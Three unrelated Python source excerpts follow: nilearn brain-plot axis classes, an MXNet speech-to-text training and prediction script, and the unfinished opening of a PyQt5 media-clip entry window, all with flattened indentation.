sep : :obj:`int` or :obj:`float`, optional
Separation between the label and the scale bar, in points.
Default=5.
size_vertical : :obj:`int` or :obj:`float`, optional
Vertical length of the size bar, given in `units`.
Default=0.
label_top : :obj:`bool`, optional
If ``True``, the label will be over the scale bar.
Default=False.
color : :obj:`str`, optional
Color for the scale bar and label. Default='black'.
fontsize : :obj:`int`, optional
Label font size (overwrites the size passed in through the
``fontproperties`` argument).
**kwargs :
Keyworded arguments to pass to
:class:`~matplotlib.offsetbox.AnchoredOffsetbox`.
"""
axis = self.ax
fontproperties = fontproperties or FontProperties()
if fontsize:
fontproperties.set_size(fontsize)
width_mm = size
if units == 'cm':
width_mm *= 10
anchor_size_bar = AnchoredSizeBar(
axis.transData,
width_mm,
'%g%s' % (size, units),
fontproperties=fontproperties,
frameon=frameon,
loc=loc,
pad=pad,
borderpad=borderpad,
sep=sep,
size_vertical=size_vertical,
label_top=label_top,
color=color,
**kwargs)
if frameon:
anchor_size_bar.patch.set_facecolor(bg_color)
anchor_size_bar.patch.set_edgecolor('none')
axis.add_artist(anchor_size_bar)
def draw_position(self, size, bg_color, **kwargs):
"""``draw_position`` is not implemented in base class and
should be implemented in derived classes.
"""
raise NotImplementedError("'draw_position' should be implemented "
"in derived classes")
@fill_doc
class CutAxes(BaseAxes):
"""An MPL axis-like object that displays a cut of 3D volumes.
Parameters
----------
%(ax)s
direction : {'x', 'y', 'z'}
The directions of the view.
coord : :obj:`float`
The coordinate along the direction of the cut.
"""
def transform_to_2d(self, data, affine):
"""Cut the 3D volume into a 2D slice.
Parameters
----------
data : 3D :class:`~numpy.ndarray`
The 3D volume to cut.
affine : 4x4 :class:`~numpy.ndarray`
The affine of the volume.
"""
coords = [0, 0, 0]
if self.direction not in ['x', 'y', 'z']:
raise ValueError('Invalid value for direction %s' %
self.direction)
coords['xyz'.index(self.direction)] = self.coord
x_map, y_map, z_map = [int(np.round(c)) for c in
coord_transform(coords[0],
coords[1],
coords[2],
np.linalg.inv(affine))]
if self.direction == 'y':
cut = np.rot90(data[:, y_map, :])
elif self.direction == 'x':
cut = np.rot90(data[x_map, :, :])
elif self.direction == 'z':
cut = np.rot90(data[:, :, z_map])
return cut
def draw_position(self, size, bg_color, decimals=False, **kwargs):
"""Draw coordinates.
Parameters
----------
size : :obj:`float`, optional
Size of the text area.
bg_color : matplotlib color: :obj:`str` or (r, g, b) value
The background color for text area.
decimals : :obj:`bool` or :obj:`str`, optional
Formatting string for the coordinates.
If set to ``False``, integer formatting will be used.
Default=False.
"""
if decimals:
text = '%s=%.{}f'.format(decimals)
coord = float(self.coord)
else:
text = '%s=%i'
coord = self.coord
ax = self.ax
ax.text(0, 0, text % (self.direction, coord),
transform=ax.transAxes,
horizontalalignment='left',
verticalalignment='bottom',
size=size,
bbox=dict(boxstyle="square,pad=0",
ec=bg_color, fc=bg_color, alpha=1),
**kwargs)
def _get_index_from_direction(direction):
"""Returns numerical index from direction."""
directions = ['x', 'y', 'z']
try:
# l and r are subcases of x
if direction in 'lr':
index = 0
else:
index = directions.index(direction)
except ValueError:
message = (
'{0} is not a valid direction. '
"Allowed values are 'l', 'r', 'x', 'y' and 'z'").format(direction)
raise ValueError(message)
return index
def _coords_3d_to_2d(coords_3d, direction, return_direction=False):
"""Project 3d coordinates into 2d ones given the direction of a cut."""
index = _get_index_from_direction(direction)
dimensions = [0, 1, 2]
dimensions.pop(index)
if return_direction:
return coords_3d[:, dimensions], coords_3d[:, index]
return coords_3d[:, dimensions]
@fill_doc
class GlassBrainAxes(BaseAxes):
"""An MPL axis-like object that displays a 2D projection of 3D
volumes with a schematic view of the brain.
Parameters
----------
%(ax)s
direction : {'x', 'y', 'z'}
The directions of the view.
coord : :obj:`float`
The coordinate along the direction of the cut.
plot_abs : :obj:`bool`, optional
If set to ``True`` the absolute value of the data will be considered.
Default=True.
"""
def __init__(self, ax, direction, coord, plot_abs=True, **kwargs):
super(GlassBrainAxes, self).__init__(ax, direction, coord)
self._plot_abs = plot_abs
if ax is not None:
object_bounds = plot_brain_schematics(ax, direction, **kwargs)
self.add_object_bounds(object_bounds)
def transform_to_2d(self, data, affine):
"""Returns the maximum of the absolute value of the 3D volume
along an axis.
Parameters
----------
data : 3D :class:`numpy.ndarray`
The 3D volume.
affine : 4x4 :class:`numpy.ndarray`
The affine of the volume.
"""
if self.direction in 'xlr':
max_axis = 0
else:
max_axis = '.yz'.index(self.direction)
# set unselected brain hemisphere activations to 0
if self.direction == 'l':
x_center, _, _, _ = np.dot(np.linalg.inv(affine),
np.array([0, 0, 0, 1]))
data_selection = data[:int(x_center), :, :]
elif self.direction == 'r':
x_center, _, _, _ = np.dot(np.linalg.inv(affine),
np.array([0, 0, 0, 1]))
data_selection = data[int(x_center):, :, :]
else:
data_selection = data
# We need to make sure data_selection is not empty in the x axis
# This should be the case since we expect images in MNI space
if data_selection.shape[0] == 0:
data_selection = data
if not self._plot_abs:
# get the shape of the array we are projecting to
new_shape = list(data.shape)
del new_shape[max_axis]
# generate a 3D indexing array that points to max abs value in the
# current projection
a1, a2 = np.indices(new_shape)
inds = [a1, a2]
inds.insert(max_axis, np.abs(data_selection).argmax(axis=max_axis))
# take the values where the absolute value of the projection
# is the highest
maximum_intensity_data = data_selection[tuple(inds)]
else:
maximum_intensity_data = np.abs(data_selection).max(axis=max_axis)
# This work around can be removed bumping matplotlib > 2.1.0. See #1815
# in nilearn for the invention of this work around
if self.direction == 'l' and data_selection.min() is np.ma.masked and \
not (self.ax.get_xlim()[0] > self.ax.get_xlim()[1]):
self.ax.invert_xaxis()
return np.rot90(maximum_intensity_data)
def draw_position(self, size, bg_color, **kwargs):
"""Not implemented as it does not make sense to draw crosses for
the position of the cuts since we are taking the max along one axis.
"""
pass
def _add_markers(self, marker_coords, marker_color, marker_size, **kwargs):
"""Plot markers.
In the case of 'l' and 'r' directions (for hemispheric projections),
markers in the coordinate x == 0 are included in both hemispheres.
"""
marker_coords_2d = _coords_3d_to_2d(marker_coords, self.direction)
xdata, ydata = marker_coords_2d.T
# Allow markers only in their respective hemisphere when appropriate
if self.direction in 'lr':
if not isinstance(marker_color, str) and \
not isinstance(marker_color, np.ndarray):
marker_color = np.asarray(marker_color)
relevant_coords = []
xcoords, ycoords, zcoords = marker_coords.T
for cidx, xc in enumerate(xcoords):
if self.direction == 'r' and xc >= 0:
relevant_coords.append(cidx)
elif self.direction == 'l' and xc <= 0:
relevant_coords.append(cidx)
xdata = xdata[relevant_coords]
ydata = ydata[relevant_coords]
# if marker_color is string for example 'red' or 'blue', then
# we pass marker_color as it is to matplotlib scatter without
# making any selection in 'l' or 'r' color.
# More likely that user wants to display all nodes to be in
# same color.
if not isinstance(marker_color, str) and \
len(marker_color) != 1:
marker_color = marker_color[relevant_coords]
if not isinstance(marker_size, numbers.Number):
marker_size = np.asarray(marker_size)[relevant_coords]
defaults = {'marker': 'o',
'zorder': 1000}
for k, v in defaults.items():
kwargs.setdefault(k, v)
self.ax.scatter(xdata, ydata, s=marker_size,
c=marker_color, **kwargs)
def _add_lines(self, line_coords, line_values, cmap,
vmin=None, vmax=None, directed=False, **kwargs):
"""Plot lines
Parameters
----------
line_coords : :obj:`list` of :class:`numpy.ndarray` of shape (2, 3)
3D coordinates of lines start points and end points.
line_values : array_like
Values of the lines.
cmap : :class:`~matplotlib.colors.Colormap`
Colormap used to map ``line_values`` to a color.
vmin, vmax : :obj:`float`, optional
If not ``None``, either or both of these values will be used to
as the minimum and maximum values to color lines. If ``None`` are
supplied the maximum absolute value within the given threshold
will be used as minimum (multiplied by -1) and maximum
coloring levels.
directed : :obj:`bool`, optional
Add arrows instead of lines if set to ``True``.
Use this when plotting directed graphs for example.
Default=False.
kwargs : :obj:`dict`
Additional arguments to pass to :class:`~matplotlib.lines.Line2D`.
"""
# colormap for colorbar
self.cmap = cmap
if vmin is None and vmax is None:
abs_line_values_max = np.abs(line_values).max()
vmin = -abs_line_values_max
vmax = abs_line_values_max
elif vmin is None:
if vmax > 0:
vmin = -vmax
else:
raise ValueError(
"If vmax is set to a non-positive number "
"then vmin needs to be specified"
)
elif vmax is None:
if vmin < 0:
vmax = -vmin
else:
raise ValueError(
"If vmin is set to a non-negative number "
"then vmax needs to be specified"
)
norm = Normalize(vmin=vmin, vmax=vmax)
# normalization useful for colorbar
self.norm = norm
abs_norm = Normalize(vmin=0, vmax=vmax)
value_to_color = plt.cm.ScalarMappable(norm=norm, cmap=cmap).to_rgba
# Allow lines only in their respective hemisphere when appropriate
if self.direction in 'lr':
relevant_lines = []
for lidx, line in enumerate(line_coords):
if self.direction == 'r':
if line[0, 0] >= 0 and line[1, 0] >= 0:
relevant_lines.append(lidx)
elif self.direction == 'l':
if line[0, 0] < 0 and line[1, 0] < 0:
relevant_lines.append(lidx)
line_coords = np.array(line_coords)[relevant_lines]
line_values = line_values[relevant_lines]
for start_end_point_3d, line_value in zip(
line_coords, line_values):
start_end_point_2d = _coords_3d_to_2d(start_end_point_3d,
self.direction)
color = value_to_color(line_value)
abs_line_value = abs(line_value)
linewidth = 1 + 2 * abs_norm(abs_line_value)
# Hacky way to put the strongest connections on top of the weakest
# note sign does not matter hence using 'abs'
zorder = 10 + 10 * abs_norm(abs_line_value)
this_kwargs = {'color': color, 'linewidth': linewidth,
'zorder': zorder}
# kwargs should have priority over this_kwargs so that the
# user can override the default logic
this_kwargs.update(kwargs)
xdata, ydata = start_end_point_2d.T
# If directed is True, add an arrow
if directed:
dx = xdata[1] - xdata[0]
dy = ydata[1] - ydata[0]
# Hack to avoid empty arrows to crash with
# matplotlib versions older than 3.1
# This can be removed once support for
# matplotlib pre 3.1 has been dropped.
if dx == 0 and dy == 0:
arrow = FancyArrow(xdata[0], ydata[0],
dx, dy)
else:
arrow = FancyArrow(xdata[0], ydata[0],
dx, dy,
length_includes_head=True,
width=linewidth,
head_width=3 * linewidth,
**this_kwargs)
self.ax.add_patch(arrow)
# Otherwise a line
else:
line = Line2D(xdata, ydata, **this_kwargs)
self.ax.add_line(line)
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import os
import sys
from collections import namedtuple
from datetime import datetime
from config_util import parse_args, parse_contexts, generate_file_path
from train import do_training
import mxnet as mx
from stt_io_iter import STTIter
from label_util import LabelUtil
from log_util import LogUtil
import numpy as np
from stt_datagenerator import DataGenerator
from stt_metric import STTMetric
from stt_bi_graphemes_util import generate_bi_graphemes_dictionary
from stt_bucketing_module import STTBucketingModule
from stt_io_bucketingiter import BucketSTTIter
sys.path.insert(0, "../../python")
# os.environ['MXNET_ENGINE_TYPE'] = "NaiveEngine"
os.environ['MXNET_ENGINE_TYPE'] = "ThreadedEnginePerDevice"
os.environ['MXNET_ENABLE_GPU_P2P'] = "0"
logUtil = LogUtil.getInstance()
class WHCS:
width = 0
height = 0
channel = 0
stride = 0
class ConfigLogger(object):
def __init__(self, log):
self.__log = log
def __call__(self, config):
self.__log.info("Config:")
config.write(self)
def write(self, data):
# stripping the data makes the output nicer and avoids empty lines
line = data.strip()
self.__log.info(line)
def load_labelutil(labelUtil, is_bi_graphemes, language="en"):
if language == "en":
if is_bi_graphemes:
try:
labelUtil.load_unicode_set("resources/unicodemap_en_baidu_bi_graphemes.csv")
except:
raise Exception("There is no resources/unicodemap_en_baidu_bi_graphemes.csv." +
" Please set overwrite_bi_graphemes_dictionary True at train section")
else:
labelUtil.load_unicode_set("resources/unicodemap_en_baidu.csv")
else:
raise Exception("Error: Language Type: %s" % language)
def load_data(args):
mode = args.config.get('common', 'mode')
if mode not in ['train', 'predict', 'load']:
raise Exception('mode must be the one of the followings - train,predict,load')
batch_size = args.config.getint('common', 'batch_size')
whcs = WHCS()
whcs.width = args.config.getint('data', 'width')
whcs.height = args.config.getint('data', 'height')
whcs.channel = args.config.getint('data', 'channel')
whcs.stride = args.config.getint('data', 'stride')
save_dir = 'checkpoints'
model_name = args.config.get('common', 'prefix')
is_bi_graphemes = args.config.getboolean('common', 'is_bi_graphemes')
overwrite_meta_files = args.config.getboolean('train', 'overwrite_meta_files')
overwrite_bi_graphemes_dictionary = args.config.getboolean('train', 'overwrite_bi_graphemes_dictionary')
max_duration = args.config.getfloat('data', 'max_duration')
language = args.config.get('data', 'language')
log = logUtil.getlogger()
labelUtil = LabelUtil.getInstance()
if mode == "train" or mode == "load":
data_json = args.config.get('data', 'train_json')
val_json = args.config.get('data', 'val_json')
datagen = DataGenerator(save_dir=save_dir, model_name=model_name)
datagen.load_train_data(data_json, max_duration=max_duration)
datagen.load_validation_data(val_json, max_duration=max_duration)
if is_bi_graphemes:
if not os.path.isfile("resources/unicodemap_en_baidu_bi_graphemes.csv") or overwrite_bi_graphemes_dictionary:
load_labelutil(labelUtil=labelUtil, is_bi_graphemes=False, language=language)
generate_bi_graphemes_dictionary(datagen.train_texts+datagen.val_texts)
load_labelutil(labelUtil=labelUtil, is_bi_graphemes=is_bi_graphemes, language=language)
args.config.set('arch', 'n_classes', str(labelUtil.get_count()))
if mode == "train":
if overwrite_meta_files:
log.info("Generate mean and std from samples")
normalize_target_k = args.config.getint('train', 'normalize_target_k')
datagen.sample_normalize(normalize_target_k, True)
else:
log.info("Read mean and std from meta files")
datagen.get_meta_from_file(
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_mean')),
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_std')))
elif mode == "load":
# get feat_mean and feat_std to normalize dataset
datagen.get_meta_from_file(
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_mean')),
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_std')))
elif mode == 'predict':
test_json = args.config.get('data', 'test_json')
datagen = DataGenerator(save_dir=save_dir, model_name=model_name)
datagen.load_train_data(test_json, max_duration=max_duration)
labelutil = load_labelutil(labelUtil, is_bi_graphemes, language="en")
args.config.set('arch', 'n_classes', str(labelUtil.get_count()))
datagen.get_meta_from_file(
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_mean')),
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_std')))
is_batchnorm = args.config.getboolean('arch', 'is_batchnorm')
if batch_size == 1 and is_batchnorm and (mode == 'train' or mode == 'load'):
raise Warning('batch size 1 is too small for is_batchnorm')
# sort file paths by its duration in ascending order to implement sortaGrad
if mode == "train" or mode == "load":
max_t_count = datagen.get_max_seq_length(partition="train")
max_label_length = \
datagen.get_max_label_length(partition="train", is_bi_graphemes=is_bi_graphemes)
elif mode == "predict":
max_t_count = datagen.get_max_seq_length(partition="test")
max_label_length = \
datagen.get_max_label_length(partition="test", is_bi_graphemes=is_bi_graphemes)
args.config.set('arch', 'max_t_count', str(max_t_count))
args.config.set('arch', 'max_label_length', str(max_label_length))
from importlib import import_module
prepare_data_template = import_module(args.config.get('arch', 'arch_file'))
init_states = prepare_data_template.prepare_data(args)
sort_by_duration = (mode == "train")
is_bucketing = args.config.getboolean('arch', 'is_bucketing')
save_feature_as_csvfile = args.config.getboolean('train', 'save_feature_as_csvfile')
if is_bucketing:
buckets = json.loads(args.config.get('arch', 'buckets'))
data_loaded = BucketSTTIter(partition="train",
count=datagen.count,
datagen=datagen,
batch_size=batch_size,
num_label=max_label_length,
init_states=init_states,
seq_length=max_t_count,
width=whcs.width,
height=whcs.height,
sort_by_duration=sort_by_duration,
is_bi_graphemes=is_bi_graphemes,
buckets=buckets,
save_feature_as_csvfile=save_feature_as_csvfile)
else:
data_loaded = STTIter(partition="train",
count=datagen.count,
datagen=datagen,
batch_size=batch_size,
num_label=max_label_length,
init_states=init_states,
seq_length=max_t_count,
width=whcs.width,
height=whcs.height,
sort_by_duration=sort_by_duration,
is_bi_graphemes=is_bi_graphemes,
save_feature_as_csvfile=save_feature_as_csvfile)
if mode == 'train' or mode == 'load':
if is_bucketing:
validation_loaded = BucketSTTIter(partition="validation",
count=datagen.val_count,
datagen=datagen,
batch_size=batch_size,
num_label=max_label_length,
init_states=init_states,
seq_length=max_t_count,
width=whcs.width,
height=whcs.height,
sort_by_duration=False,
is_bi_graphemes=is_bi_graphemes,
buckets=buckets,
save_feature_as_csvfile=save_feature_as_csvfile)
else:
validation_loaded = STTIter(partition="validation",
count=datagen.val_count,
datagen=datagen,
batch_size=batch_size,
num_label=max_label_length,
init_states=init_states,
seq_length=max_t_count,
width=whcs.width,
height=whcs.height,
sort_by_duration=False,
is_bi_graphemes=is_bi_graphemes,
save_feature_as_csvfile=save_feature_as_csvfile)
return data_loaded, validation_loaded, args
elif mode == 'predict':
return data_loaded, args
def load_model(args, contexts, data_train):
# load model from model_name prefix and epoch of model_num_epoch with gpu contexts of contexts
mode = args.config.get('common', 'mode')
load_optimizer_states = args.config.getboolean('load', 'load_optimizer_states')
is_start_from_batch = args.config.getboolean('load', 'is_start_from_batch')
from importlib import import_module
symbol_template = import_module(args.config.get('arch', 'arch_file'))
is_bucketing = args.config.getboolean('arch', 'is_bucketing')
if mode == 'train':
if is_bucketing:
bucketing_arch = symbol_template.BucketingArch(args)
model_loaded = bucketing_arch.get_sym_gen()
else:
model_loaded = symbol_template.arch(args)
model_num_epoch = None
elif mode == 'load' or mode == 'predict':
model_file = args.config.get('common', 'model_file')
model_name = os.path.splitext(model_file)[0]
model_num_epoch = int(model_name[-4:])
if is_bucketing:
bucketing_arch = symbol_template.BucketingArch(args)
model_loaded = bucketing_arch.get_sym_gen()
else:
model_path = 'checkpoints/' + str(model_name[:-5])
data_names = [x[0] for x in data_train.provide_data]
label_names = [x[0] for x in data_train.provide_label]
model_loaded = mx.module.Module.load(
prefix=model_path, epoch=model_num_epoch, context=contexts,
data_names=data_names, label_names=label_names,
load_optimizer_states=load_optimizer_states)
if is_start_from_batch:
import re
model_num_epoch = int(re.findall('\d+', model_file)[0])
return model_loaded, model_num_epoch
if __name__ == '__main__':
if len(sys.argv) <= 1:
raise Exception('cfg file path must be provided. ' +
'ex)python main.py --configfile examplecfg.cfg')
args = parse_args(sys.argv[1])
# set parameters from cfg file
# give random seed
random_seed = args.config.getint('common', 'random_seed')
mx_random_seed = args.config.getint('common', 'mx_random_seed')
# random seed for shuffling data list
if random_seed != -1:
np.random.seed(random_seed)
# set mx.random.seed to give seed for parameter initialization
if mx_random_seed != -1:
mx.random.seed(mx_random_seed)
else:
mx.random.seed(hash(datetime.now()))
# set log file name
log_filename = args.config.get('common', 'log_filename')
log = logUtil.getlogger(filename=log_filename)
# set parameters from data section(common)
mode = args.config.get('common', 'mode')
if mode not in ['train', 'predict', 'load']:
raise Exception(
'Define mode in the cfg file first. ' +
'train or predict or load can be the candidate for the mode.')
# get meta file where character to number conversions are defined
contexts = parse_contexts(args)
num_gpu = len(contexts)
batch_size = args.config.getint('common', 'batch_size')
# check the number of gpus is positive divisor of the batch size for data parallel
if batch_size % num_gpu != 0:
raise Exception('num_gpu should be positive divisor of batch_size')
if mode == "train" or mode == "load":
data_train, data_val, args = load_data(args)
elif mode == "predict":
data_train, args = load_data(args)
is_batchnorm = args.config.getboolean('arch', 'is_batchnorm')
is_bucketing = args.config.getboolean('arch', 'is_bucketing')
# log current config
config_logger = ConfigLogger(log)
config_logger(args.config)
# load model
model_loaded, model_num_epoch = load_model(args, contexts, data_train)
# if mode is 'train', it trains the model
if mode == 'train':
if is_bucketing:
module = STTBucketingModule(
sym_gen=model_loaded,
default_bucket_key=data_train.default_bucket_key,
context=contexts
)
else:
data_names = [x[0] for x in data_train.provide_data]
label_names = [x[0] for x in data_train.provide_label]
module = mx.mod.Module(model_loaded, context=contexts,
data_names=data_names, label_names=label_names)
do_training(args=args, module=module, data_train=data_train, data_val=data_val)
# if mode is 'load', it loads model from the checkpoint and continues the training.
elif mode == 'load':
do_training(args=args, module=model_loaded, data_train=data_train, data_val=data_val,
begin_epoch=model_num_epoch + 1)
# if mode is 'predict', it predict label from the input by the input model
elif mode == 'predict':
# predict through data
if is_bucketing:
max_t_count = args.config.getint('arch', 'max_t_count')
load_optimizer_states = args.config.getboolean('load', 'load_optimizer_states')
model_file = args.config.get('common', 'model_file')
model_name = os.path.splitext(model_file)[0]
model_num_epoch = int(model_name[-4:])
model_path = 'checkpoints/' + str(model_name[:-5])
model = STTBucketingModule(
sym_gen=model_loaded,
default_bucket_key=data_train.default_bucket_key,
context=contexts
)
model.bind(data_shapes=data_train.provide_data,
label_shapes=data_train.provide_label,
for_training=True)
_, arg_params, aux_params = mx.model.load_checkpoint(model_path, model_num_epoch)
model.set_params(arg_params, aux_params)
model_loaded = model
else:
model_loaded.bind(for_training=False, data_shapes=data_train.provide_data,
label_shapes=data_train.provide_label)
max_t_count = args.config.getint('arch', 'max_t_count')
eval_metric = STTMetric(batch_size=batch_size, num_gpu=num_gpu)
if is_batchnorm:
for nbatch, data_batch in enumerate(data_train):
model_loaded.forward(data_batch, is_train=False)
model_loaded.update_metric(eval_metric, data_batch.label)
else:
#model_loaded.score(eval_data=data_train, num_batch=None,
# eval_metric=eval_metric, reset=True)
for nbatch, data_batch in enumerate(data_train):
model_loaded.forward(data_batch, is_train=False)
model_loaded.update_metric(eval_metric, data_batch.label)
else:
raise Exception(
'Define mode in the cfg file first. ' +
'train or predict or load can be the candidate for the mode')
|
<gh_stars>0
from pathlib import Path
from PyQt5 import QtCore, QtGui, QtWidgets
from . import _DatabaseWindow
import filetype
from ..database import Type
from .. import logger
from .QCustomObject import QTagEdit
class _Add(_DatabaseWindow):
"""Base class for every add window"""
def __init__(self, window):
super().__init__(window)
old_key_press_event = self.window.keyPressEvent
def new_key_press_event(a0: QtGui.QKeyEvent):
if a0.key() in (QtCore.Qt.Key_Return, QtCore.Qt.Key_Enter) and not self.file_or_url_edit.hasFocus():
return
else:
old_key_press_event(a0)
# the normal key press event would open the file choose dialog / press the file_chooser button
# everytime enter his when a ``QLineEdit`` is focused
self.window.keyPressEvent = new_key_press_event
def after_setup_ui(self) -> None:
# file chooser
self.file_or_url_edit.textChanged.connect(self.on_text_changed)
self.file_chooser.clicked.connect(self.on_choose_file)
# save / new buttons
self.save_button.clicked.connect(self.on_save)
self.new_button.clicked.connect(self.on_new)
def on_text_changed(self, value: str) -> None:
"""This will get called if the file or url line edit text is changing"""
pass
def on_choose_file(self) -> None:
"""Opens a file choose dialog"""
# all unique media file types
all_preferred_types = [extension.extension for clip_type in [filetype.audio_matchers, filetype.image_matchers, filetype.video_matchers] for extension in clip_type]
file = QtWidgets.QFileDialog.getOpenFileName(self.window, directory=str(Path().home()),
filter=f'Preferred media file(*.{" *.".join(all_preferred_types)});;All files(*)')[0]
if file:
# checks the file type and sets the index if the type box after the type
match = filetype.guess(file)
if match in filetype.audio_matchers:
self.type_box.setCurrentIndex(0)
elif match in filetype.image_matchers:
self.type_box.setCurrentIndex(1)
elif match in filetype.video_matchers:
self.type_box.setCurrentIndex(2)
else:
self.type_box.setCurrentIndex(3)
# changes the file or url text edit text
self.file_or_url_edit.setText(file)
def on_save(self) -> None:
"""This will get called if the 'Save' button is clicked"""
pass
def on_new(self) -> None:
"""This will get called if the 'New' button is clicked"""
pass
class AddClip(_Add):
def __init__(self, window):
super().__init__(window)
# all tags which are currently in the database
self._all_tags = [tag.name for tag in self.database.Tag.get_all()]
self._source_id = 0
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(400, 469)
self.verticalLayout_2 = QtWidgets.QVBoxLayout(Form)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.add_clip = QtWidgets.QLabel(Form)
self.add_clip.setAlignment(QtCore.Qt.AlignCenter)
self.add_clip.setObjectName("add_clip")
self.verticalLayout_2.addWidget(self.add_clip)
self.name_description_frame = QtWidgets.QFrame(Form)
self.name_description_frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.name_description_frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.name_description_frame.setObjectName("name_description_frame")
self.verticalLayout = QtWidgets.QVBoxLayout(self.name_description_frame)
self.verticalLayout.setObjectName("verticalLayout")
self.file_or_url_hlayout = QtWidgets.QHBoxLayout()
self.file_or_url_hlayout.setObjectName("file_or_url_hlayout")
self.file_or_url_edit = QtWidgets.QLineEdit(self.name_description_frame)
self.file_or_url_edit.setText("")
self.file_or_url_edit.setClearButtonEnabled(False)
self.file_or_url_edit.setObjectName("file_or_url_edit")
self.file_or_url_hlayout.addWidget(self.file_or_url_edit)
self.file_chooser = QtWidgets.QPushButton(self.name_description_frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.file_chooser.sizePolicy().hasHeightForWidth())
self.file_chooser.setSizePolicy(sizePolicy)
self.file_chooser.setSizeIncrement(QtCore.QSize(0, 0))
self.file_chooser.setCheckable(False)
self.file_chooser.setObjectName("file_chooser")
self.file_or_url_hlayout.addWidget(self.file_chooser)
self.verticalLayout.addLayout(self.file_or_url_hlayout)
self.line = QtWidgets.QFrame(self.name_description_frame)
self.line.setFrameShape(QtWidgets.QFrame.HLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.verticalLayout.addWidget(self.line)
self.name_hlayout = QtWidgets.QHBoxLayout()
self.name_hlayout.setObjectName("name_hlayout")
self.name_label = QtWidgets.QLabel(self.name_description_frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.name_label.sizePolicy().hasHeightForWidth())
self.name_label.setSizePolicy(sizePolicy)
self.name_label.setMinimumSize(QtCore.QSize(70, 0))
self.name_label.setBaseSize(QtCore.QSize(0, 0))
self.name_label.setObjectName("name_label")
self.name_hlayout.addWidget(self.name_label)
self.name_edit = QtWidgets.QLineEdit(self.name_description_frame)
self.name_edit.setStyleSheet("")
self.name_edit.setReadOnly(True)
self.name_edit.setClearButtonEnabled(False)
self.name_edit.setObjectName("name_edit")
self.name_hlayout.addWidget(self.name_edit)
self.verticalLayout.addLayout(self.name_hlayout)
self.description_hlayout = QtWidgets.QHBoxLayout()
self.description_hlayout.setObjectName("description_hlayout")
self.description_label = QtWidgets.QLabel(self.name_description_frame)
self.description_label.setMinimumSize(QtCore.QSize(70, 0))
self.description_label.setBaseSize(QtCore.QSize(0, 0))
self.description_label.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.description_label.setObjectName("description_label")
self.description_hlayout.addWidget(self.description_label)
self.description_edit = QtWidgets.QTextEdit(self.name_description_frame)
self.description_edit.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.description_edit.sizePolicy().hasHeightForWidth())
self.description_edit.setSizePolicy(sizePolicy)
self.description_edit.setReadOnly(True)
self.description_edit.setObjectName("description_edit")
self.description_hlayout.addWidget(self.description_edit)
self.verticalLayout.addLayout(self.description_hlayout)
self.type_hlayout = QtWidgets.QHBoxLayout()
self.type_hlayout.setObjectName("type_hlayout")
self.type_label = QtWidgets.QLabel(self.name_description_frame)
self.type_label.setMinimumSize(QtCore.QSize(70, 0))
self.type_label.setBaseSize(QtCore.QSize(0, 0))
self.type_label.setObjectName("type_label")
self.type_hlayout.addWidget(self.type_label)
self.type_box = QtWidgets.QComboBox(self.name_description_frame)
self.type_box.setEnabled(False)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.type_box.sizePolicy().hasHeightForWidth())
self.type_box.setSizePolicy(sizePolicy)
self.type_box.setFocusPolicy(QtCore.Qt.WheelFocus)
self.type_box.setObjectName("type_box")
self.type_box.addItem("")
self.type_box.addItem("")
self.type_box.addItem("")
self.type_box.addItem("")
self.type_hlayout.addWidget(self.type_box)
self.verticalLayout.addLayout(self.type_hlayout)
self.line_3 = QtWidgets.QFrame(self.name_description_frame)
self.line_3.setFrameShape(QtWidgets.QFrame.HLine)
self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_3.setObjectName("line_3")
self.verticalLayout.addWidget(self.line_3)
self.tags_hlayout = QtWidgets.QHBoxLayout()
self.tags_hlayout.setObjectName("tags_hlayout")
self.tags_label = QtWidgets.QLabel(self.name_description_frame)
self.tags_label.setMinimumSize(QtCore.QSize(70, 0))
self.tags_label.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.tags_label.setObjectName("tags_label")
self.tags_hlayout.addWidget(self.tags_label)
self.tags_edit = QtWidgets.QScrollArea(self.name_description_frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tags_edit.sizePolicy().hasHeightForWidth())
self.tags_edit.setSizePolicy(sizePolicy)
